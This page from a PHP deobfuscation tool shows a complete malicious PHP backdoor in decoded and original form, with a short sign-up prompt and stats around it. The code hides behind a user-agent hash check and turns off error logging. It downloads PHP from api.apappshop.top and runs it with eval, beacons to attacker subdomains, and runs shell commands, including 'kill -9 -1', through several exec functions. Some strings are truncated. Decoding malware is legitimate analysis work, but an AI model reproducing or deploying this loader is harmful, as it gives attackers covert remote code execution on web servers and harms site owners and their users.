Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

?><?php@ini_set('log_errors',0);@ini_set('error_log',NULL);@ini_set('error_reporting',NULL..

Decoded Output download

<?  ?><?php@ini_set('log_errors',0);@ini_set('error_log',NULL);@ini_set('error_reporting',NULL);@error_reporting(0);@ini_set('max_execution_time',0);@set_time_limit(0);@ignore_user_abort(true);functionO($s){$O="b"."ase64_decode";$s=$O($s);$O="gzinflate";return$O($s);}session_start();if(@trim($_GET["debug"])=="on"){error_reporting(E_ALL);ini_set("display_errors",1);}@header("Content-type:text/html;charset=utf-8");define("UAMD53KEY","39542de4e2fa50462d96ea26e878a658");if(md5(md5(md5($_SERVER["HTTP_USER_AGENT"])))!=UAMD53KEY){header("HTTP/1.1 404 Not Found");header("status: 404 Not Found");die();}define("URLHEAD","http://api.apappshop.top/she2/");if(isset($_REQUEST["deleteself"])){unlink($_SERVER["SCRIPT_FILENAME"]);header("Location: ?action=shedit");exit;}if(isset($_REQUEST["kill91"])){CYOOQIQK("kill -9 -1");exit;}if(!isset($_REQUEST["start"])){if(isset($_POST["domains"])){$DMNQ=explode("
",$_POST["domains"]);foreach($DMNQas$PZFP){$PZFP=trim($PZFP);if(strstr($PZFP,':$PZFP=parse_url($PZFP);$PZFP=$PZFP["host"];}$BISF="http://".$PZFP."/monitor.php";$RYUQ=WPMRBLOF($BISF);if($RYUQ==$PZFP){echo$PZFP."<br>";}else{echo$PZFP."<br>";}}}else{$BOMR="keywordfada20201115.apappshop.top,keywordfrshe220631.apappshop.top,shop4725214240.apappshop.top";$XJFS=explode(',',$BOMR);echo"<br>";foreach($XJFSas$MXBU){if($MXBU==WPMRBLOF("http://".$MXBU."/monitor.php")){echo$MXBU."<br>";}else{echo$MXBU."<br>";}}}echoO('4+XitEnLL8pVyE0tychPsVUK8A8OUbLj5eLkfDp;echo"(Server Software):".$_SERVER["SERVER_SOFTWARE"]."<br> 
";if($EYKF=VFOHKQAG()){echo"<a href="?start">Click To Start</a>"."<br> 
";echo" 
		<form action="" method="POST"> 
			<select name="v">";foreach($EYKFas$YHGC){echo"<option value="".$YHGC.'">'.$YHGC."</option>";}echo"</select><br> 
		<label><input type="checkbox" name="mini" value="on"></label><br> 
		<label><input type="checkbox" name="cf" value="off">evalcf</label><br> 
		<input type="hidden" name="start" value="on"> 
		<input type="submit" value=""> 
		</form>";}else{echo"Connection Fail!()"."<br> 
";}echo"<a href="?kill91">kill -9 -1</a>"."<br><br> 
";echo"<a href="?deleteself">Delete Self</a>"."<br><br> 
";exit;}if(isset($_REQUEST["id"])&&!empty($_REQUEST["id"])){$CRNQ=$_REQUEST["id"];}else{$CRNQ=1;}if(isset($_REQUEST["mini"])&&$_REQUEST["mini"]=="on"){$_SESSION["mini"]="on";$HQJS="&mini=on";}else{$HQJS='';}if(isset($_REQUEST["cf"])&&$_REQUEST["cf"]=="off"){$_SESSION["cf"]="off";$RNFA="&cf=off";}else{$RNFA='';}if(isset($_REQUEST["v"])&&!empty($_REQUEST["v"])){$SKSU=URLHEAD."?file=".$CRNQ.".txt"."&encoder=off&v=".$_REQUEST["v"];}else{$SKSU=URLHEAD."?file=".$CRNQ.".txt"."&encoder=off";}$ORLR=file_get_contents($SKSU);if(substr($ORLR,0,5)!="<?php"){define("USECURL","yes");$ORLR=WPMRBLOF($SKSU);}if(substr($ORLR,0,5)=="<?php"){eval("?>".$ORLR);}functionWPMRBLOF($BISF){if(defined("USECURL")&&USECURL=="no"){$NYHV=false;}else{$NYHV=true;}if(function_exists("curl_init")){$FAFD=curl_init();curl_setopt($FAFD,CURLOPT_URL,$BISF);curl_setopt($FAFD,CURLOPT_HEADER,0);curl_setopt($FAFD,CURLOPT_RETURNTRANSFER,1);curl_setopt($FAFD,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($FAFD,CURLOPT_SSL_VERIFYHOST,false);curl_setopt($FAFD,CURLOPT_TIMEOUT,30);curl_setopt($FAFD,CURLOPT_ENCODING,'');curl_setopt($FAFD,CURLOPT_USERAGENT,$_SERVER["HTTP_USER_AGENT"]);curl_setopt($FAFD,CURLOPT_FOLLOWLOCATION,1);$WSEB=curl_exec($FAFD);curl_close($FAFD);}else{$NYHV=false;}if($NYHV==false){ini_set("user_agent",$_SERVER["HTTP_USER_AGENT"]);$WSEB=file_get_contents($BISF);}return$WSEB;}functionVFOHKQAG(){$EEME=parse_url(URLHEAD);$BISF="http://".$EEME["host"]."/she2/versions.php?file=output.txt";$RYUQ=WPMRBLOF($BISF);if($EEME=WVXIQCCK($RYUQ,true)){return$EEME;}returnfalse;}functionWVXIQCCK($KWRS,$XBPY=false){if(function_exists("json_decode")){returnjson_decode($KWRS,$XBPY);}else{$YZNK=md5("Services_JSON.php");if(!is_file($YZNK)){file_put_contents($YZNK,WPMRBLOF("https://raw.githubusercontent.com/pear/Services_JSON/trunk/JSON.php"));}include_once$YZNK;if($XBPY){if(class_exists("Services_JSON")){$WSEB='';$ORLR="$json = new Services_JSON(SERVICES_JSON_LOOSE_TYPE);$WSEB = $json->decode($KWRS);";eval($ORLR);return$WSEB;}}else{if(class_exists("Services_JSON")){$WSEB='';$ORLR="$json = new Services_JSON;$WSEB = $json->decode($KWRS);";eval($ORLR);return$WSEB;}}}return'';}functionSHVUXZEY($PXOS){$MZDP=explode(',',ini_get("disable_functions"));return!in_array($PXOS,$MZDP);}functionCYOOQIQK($ZQUD){if(SHVUXZEY("exec")){echo"using exec<br>";exec($ZQUD,$EEME);print_r($EEME);return;}if(SHVUXZEY("system")){echo"using system<br>";echosystem($ZQUD);return;}if(SHVUXZEY("passthru")){echo"using passthru<br>";passthru($ZQUD);return;}if(SHVUXZEY("popen")){echo"using popen<br>";$LURS=popen($ZQUD,"r");while(!feof($LURS)){$EEEF=fgets($LURS,4096);echo$EEEF;}pclose($LURS);return;}if(SHVUXZEY("proc_open")){echo"using proc_open<br>";$HGCP=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$LURS=proc_open($ZQUD,$HGCP,$XPKC);echostream_get_contents($XPKC[1]);proc_close($LURS);return;}if(SHVUXZEY("shell_exec")){echo"using shell_exec<br>";echoshell_exec($ZQUD);return;}echo"can't execute command! all function denied";return;}

Did this file decode correctly?

Original Code

?><?php@ini_set('log_errors',0);@ini_set('error_log',NULL);@ini_set('error_reporting',NULL);@error_reporting(0);@ini_set('max_execution_time',0);@set_time_limit(0);@ignore_user_abort(true);functionO($s){$O="\x62"."\x61s\x656\x34_\x64\x65c\x6f\x64\x65";$s=$O($s);$O="\x67\x7ain\x66l\x61t\x65";return$O($s);}session_start();if(@trim($_GET["debug"])=="on"){error_reporting(E_ALL);ini_set("display_errors",1);}@header("Content-type:text/html;charset=utf-8");define("UAMD53KEY","39542de4e2fa50462d96ea26e878a658");if(md5(md5(md5($_SERVER["HTTP_USER_AGENT"])))!=UAMD53KEY){header("HTTP/1.1 404 Not Found");header("status: 404 Not Found");die();}define("URLHEAD","http://api.apappshop.top/she2/");if(isset($_REQUEST["deleteself"])){unlink($_SERVER["SCRIPT_FILENAME"]);header("Location: ?action=shedit");exit;}if(isset($_REQUEST["kill91"])){CYOOQIQK("kill -9 -1");exit;}if(!isset($_REQUEST["start"])){if(isset($_POST["domains"])){$DMNQ=explode("\n",$_POST["domains"]);foreach($DMNQas$PZFP){$PZFP=trim($PZFP);if(strstr($PZFP,':$PZFP=parse_url($PZFP);$PZFP=$PZFP["host"];}$BISF="http://".$PZFP."/monitor.php";$RYUQ=WPMRBLOF($BISF);if($RYUQ==$PZFP){echo$PZFP."<br>";}else{echo$PZFP."<br>";}}}else{$BOMR="keywordfada20201115.apappshop.top,keywordfrshe220631.apappshop.top,shop4725214240.apappshop.top";$XJFS=explode(',',$BOMR);echo"<br>";foreach($XJFSas$MXBU){if($MXBU==WPMRBLOF("http://".$MXBU."/monitor.php")){echo$MXBU."<br>";}else{echo$MXBU."<br>";}}}echoO('4+XitEnLL8pVyE0tychPsVUK8A8OUbLj5eLkfDp;echo"(Server Software):".$_SERVER["SERVER_SOFTWARE"]."<br>
";if($EYKF=VFOHKQAG()){echo"<a href="?start">Click To Start</a>"."<br>
";echo"
		<form action="" method="POST">
			<select name="v">";foreach($EYKFas$YHGC){echo"<option value="".$YHGC.'">'.$YHGC."</option>";}echo"</select><br>
		<label><input type="checkbox" name="mini" value="on"></label><br>
		<label><input type="checkbox" name="cf" value="off">evalcf</label><br>
		<input type="hidden" name="start" value="on">
		<input type="submit" value="">
		</form>";}else{echo"Connection Fail!()"."<br>
";}echo"<a href="?kill91">kill -9 -1</a>"."<br><br>
";echo"<a href="?deleteself">Delete Self</a>"."<br><br>
";exit;}if(isset($_REQUEST["id"])&&!empty($_REQUEST["id"])){$CRNQ=$_REQUEST["id"];}else{$CRNQ=1;}if(isset($_REQUEST["mini"])&&$_REQUEST["mini"]=="on"){$_SESSION["mini"]="on";$HQJS="&mini=on";}else{$HQJS='';}if(isset($_REQUEST["cf"])&&$_REQUEST["cf"]=="off"){$_SESSION["cf"]="off";$RNFA="&cf=off";}else{$RNFA='';}if(isset($_REQUEST["v"])&&!empty($_REQUEST["v"])){$SKSU=URLHEAD."?file=".$CRNQ.".txt"."&encoder=off&v=".$_REQUEST["v"];}else{$SKSU=URLHEAD."?file=".$CRNQ.".txt"."&encoder=off";}$ORLR=file_get_contents($SKSU);if(substr($ORLR,0,5)!="<?php"){define("USECURL","yes");$ORLR=WPMRBLOF($SKSU);}if(substr($ORLR,0,5)=="<?php"){eval("?>".$ORLR);}functionWPMRBLOF($BISF){if(defined("USECURL")&&USECURL=="no"){$NYHV=false;}else{$NYHV=true;}if(function_exists("curl_init")){$FAFD=curl_init();curl_setopt($FAFD,CURLOPT_URL,$BISF);curl_setopt($FAFD,CURLOPT_HEADER,0);curl_setopt($FAFD,CURLOPT_RETURNTRANSFER,1);curl_setopt($FAFD,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($FAFD,CURLOPT_SSL_VERIFYHOST,false);curl_setopt($FAFD,CURLOPT_TIMEOUT,30);curl_setopt($FAFD,CURLOPT_ENCODING,'');curl_setopt($FAFD,CURLOPT_USERAGENT,$_SERVER["HTTP_USER_AGENT"]);curl_setopt($FAFD,CURLOPT_FOLLOWLOCATION,1);$WSEB=curl_exec($FAFD);curl_close($FAFD);}else{$NYHV=false;}if($NYHV==false){ini_set("user_agent",$_SERVER["HTTP_USER_AGENT"]);$WSEB=file_get_contents($BISF);}return$WSEB;}functionVFOHKQAG(){$EEME=parse_url(URLHEAD);$BISF="http://".$EEME["host"]."/she2/versions.php?file=output.txt";$RYUQ=WPMRBLOF($BISF);if($EEME=WVXIQCCK($RYUQ,true)){return$EEME;}returnfalse;}functionWVXIQCCK($KWRS,$XBPY=false){if(function_exists("json_decode")){returnjson_decode($KWRS,$XBPY);}else{$YZNK=md5("Services_JSON.php");if(!is_file($YZNK)){file_put_contents($YZNK,WPMRBLOF("https://raw.githubusercontent.com/pear/Services_JSON/trunk/JSON.php"));}include_once$YZNK;if($XBPY){if(class_exists("Services_JSON")){$WSEB='';$ORLR="$json = new Services_JSON(SERVICES_JSON_LOOSE_TYPE);$WSEB = $json->decode($KWRS);";eval($ORLR);return$WSEB;}}else{if(class_exists("Services_JSON")){$WSEB='';$ORLR="$json = new Services_JSON;$WSEB = $json->decode($KWRS);";eval($ORLR);return$WSEB;}}}return'';}functionSHVUXZEY($PXOS){$MZDP=explode(',',ini_get("disable_functions"));return!in_array($PXOS,$MZDP);}functionCYOOQIQK($ZQUD){if(SHVUXZEY("exec")){echo"using exec<br>";exec($ZQUD,$EEME);print_r($EEME);return;}if(SHVUXZEY("system")){echo"using system<br>";echosystem($ZQUD);return;}if(SHVUXZEY("passthru")){echo"using passthru<br>";passthru($ZQUD);return;}if(SHVUXZEY("popen")){echo"using popen<br>";$LURS=popen($ZQUD,"r");while(!feof($LURS)){$EEEF=fgets($LURS,4096);echo$EEEF;}pclose($LURS);return;}if(SHVUXZEY("proc_open")){echo"using proc_open<br>";$HGCP=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$LURS=proc_open($ZQUD,$HGCP,$XPKC);echostream_get_contents($XPKC[1]);proc_close($LURS);return;}if(SHVUXZEY("shell_exec")){echo"using shell_exec<br>";echoshell_exec($ZQUD);return;}echo"can't execute command! all function denied";return;}

Function Calls

None

Variables

None

Stats

MD5 16403d6c09a339b549e63f0ce7c75967
Eval Count 0
Decode Time 44 ms